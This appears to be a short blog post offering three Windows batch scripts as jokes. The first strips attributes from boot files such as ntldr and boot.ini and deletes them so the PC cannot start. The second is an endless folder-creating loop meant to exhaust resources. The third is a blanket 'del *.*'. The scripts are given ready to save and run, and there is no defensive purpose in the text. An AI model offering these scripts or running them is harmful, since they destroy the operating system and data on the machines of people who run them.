- Shutdown PC Forever :
[box type=”info” size=”meduim” style=”rounded” border=”full”]echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini[/box]
After it, save the file as Shutdown.bat Running this file will Shutdown your PC forever. Run it if you don’t love your PC.
- Numerous Folders within Seconds :
[box type=”info” size=”meduim” style=”rounded” border=”full”]echo off
:top
md %random%
goto top[/box]
After it, simply save it as Rambuster.bat Running this file will create numerous folder and chances are that RAM will be busted.
- Delete all your system :
[box type=”info” size=”meduim” style=”rounded” border=”full”]del *.*[/box]
Save the file and run it at your own risk.
..seryoso forever?? #WALANGFOREVER :shifty:
